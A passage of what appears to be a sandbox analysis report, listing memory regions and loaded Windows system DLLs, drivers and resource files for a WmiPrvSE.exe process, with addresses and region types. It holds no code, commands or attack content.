"\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1911 start_va = 0x7ff9fc2b0000 end_va = 0x7ff9fc47efff monitored = 1 entry_point = 0x7ff9fc2d7df0 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 1912 start_va = 0x7ff9fe4b0000 end_va = 0x7ff9fe4c3fff monitored = 0 entry_point = 0x7ff9fe4b1310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1913 start_va = 0x7ff9ff220000 end_va = 0x7ff9ff22dfff monitored = 0 entry_point = 0x7ff9ff221da0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1914 start_va = 0x7ffa06830000 end_va = 0x7ffa06855fff monitored = 0 entry_point = 0x7ffa06831cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1915 start_va = 0x7ffa07ad0000 end_va = 0x7ffa07ae5fff monitored = 0 entry_point = 0x7ffa07ad55e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1916 start_va = 0x7ffa07c90000 end_va = 0x7ffa07cb4fff monitored = 0 entry_point = 0x7ffa07c99900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1917 start_va = 0x7ffa07cc0000 end_va = 0x7ffa07cd3fff monitored = 0 entry_point = 0x7ffa07cc1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1918 start_va = 0x7ffa07ce0000 end_va = 0x7ffa07dd5fff monitored = 0 entry_point = 0x7ffa07d19590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1919 start_va = 0x7ffa08390000 end_va = 0x7ffa083a0fff monitored = 0 entry_point = 0x7ffa08392fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1920 start_va = 0x7ffa088d0000 end_va = 0x7ffa088dafff monitored = 0 entry_point = 0x7ffa088d12b0 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 1921 start_va = 0x7ffa08a00000 end_va = 0x7ffa08a0bfff monitored = 0 entry_point = 0x7ffa08a035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1922 start_va = 0x7ffa09490000 end_va = 0x7ffa0950efff monitored = 1 entry_point = 0x7ffa094a7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1923 start_va = 0x7ffa0afc0000 end_va = 0x7ffa0afd1fff monitored = 0 entry_point = 0x7ffa0afc3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1924 start_va = 0x7ffa0c150000 end_va = 0x7ffa0c19dfff monitored = 0 entry_point = 0x7ffa0c161ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1925 start_va = 0x7ffa0c300000 end_va = 0x7ffa0c318fff monitored = 0 entry_point = 0x7ffa0c304520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1926 start_va = 0x7ffa0e880000 end_va = 0x7ffa0e895fff monitored = 0 entry_point = 0x7ffa0e881b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1927 start_va = 0x7ffa0f030000 end_va = 0x7ffa0f06dfff monitored = 0 entry_point = 0x7ffa0f03a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1928 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1929 start_va = 0x7ffa0ff20000 end_va = 0x7ffa0ff29fff monitored = 0 entry_point = 0x7ffa0ff21660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1930 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1931 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1932 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1933 start_va = 0x7ffa122e0000 end_va = 0x7ffa12359fff monitored = 0 entry_point = 0x7ffa12301a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1934 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1935 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1936 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1937 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1938 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1939 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1940 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1941 start_va = 0x7ffa13110000 end_va = 0x7ffa13126fff monitored = 0 entry_point = 0x7ffa13111390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1942 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1943 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1944 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1945 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1946 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1947 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1948 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1949 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1950 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1951 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1952 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1953 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1954 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1955 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1956 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2091 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2093 start_va = 0x12b0000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 2094 start_va = 0x410000 end_va = 0x425fff monitored = 0 entry_point = 0x420420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 2095 start_va = 0x430000 end_va = 0x432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 2096 start_va = 0x410000 end_va = 0x425fff monitored = 0 entry_point = 0x420420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 2097 start_va = 0x430000 end_va = 0x432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 2098 start_va = 0x410000 end_va = 0x425fff monitored = 0 entry_point = 0x420420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 2099 start_va = 0x430000 end_va = 0x432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 2100 start_va = 0x410000 end_va = 0x425fff monitored = 0 entry_point = 0x420420 region_type = mapped_file name = "synth3dvsc.sys" filename = "\\Windows\\System32\\drivers\\Synth3dVsc.sys" (normalized: "c:\\windows\\system32\\drivers\\synth3dvsc.sys") Region: id = 2101 start_va = 0x430000 end_va = 0x432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "synth3dvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\synth3dvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\synth3dvsc.sys.mui") Region: id = 2102 start_va = 0x410000 end_va = 0x429fff monitored = 1 entry_point = 0x411190 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 2103 start_va = 0x430000 end_va = 0x435fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 2104 start_va = 0x410000 end_va = 0x429fff monitored = 1 entry_point = 0x411190 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 2105 start_va = 0x430000 end_va = 0x435fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 2106 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.dll.mui" filename = "\\Windows\\System32\\en-US\\lsm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.dll.mui") Region: id = 2107 start_va = 0x13b0000 end_va = 0x146bfff monitored = 0 entry_point = 0x13ec480 region_type = mapped_file name = "lsm.dll" filename = "\\Windows\\System32\\lsm.dll" (normalized: "c:\\windows\\system32\\lsm.dll") Region: id = 2108 start_va = 0x410000 end_va = 0x412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.dll.mui" filename = "\\Windows\\System32\\en-US\\lsm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.dll.mui") Region: id = 2109 start_va = 0x13b0000 end_va = 0x146bfff monitored = 0 entry_point = 0x13ec480 region_type = mapped_file name = "lsm.dll" filename = "\\Windows\\System32\\lsm.dll" (normalized: "c:\\windows\\system32\\lsm.dll") Region: id = 2110 start_va = 0x410000 end_va = 0x43afff monitored = 0 entry_point = 0x42d000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 2111 start_va = 0x440000 end_va = 0x444fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 2112 start_va = 0x410000 end_va = 0x43afff monitored = 0 entry_point = 0x42d000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 2113 start_va = 0x440000 end_va = 0x444fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 2114 start_va = 0x410000 end_va = 0x43afff monitored = 0 entry_point = 0x42d000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 2115 start_va = 0x440000 end_va = 0x444fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 2116 start_va = 0x410000 end_va = 0x43afff monitored = 0 entry_point = 0x42d000 region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 2117 start_va = 0x440000 end_va = 0x444fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 2118 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2119 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2120 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2121 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2122 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2123 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2124 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2125 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2126 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2127 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2128 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2129 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2130 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2131 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2132 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2133 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2134 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2135 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2136 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2137 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2138 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2139 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2140 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2141 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2142 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2143 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2144 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2145 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2146 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2147 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2148 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2149 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2150 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2151 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2152 start_va = 0x410000 end_va = 0x476fff monitored = 0 entry_point = 0x4163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2153 start_va = 0x13b0000 end_va = 0x13ccfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 2154 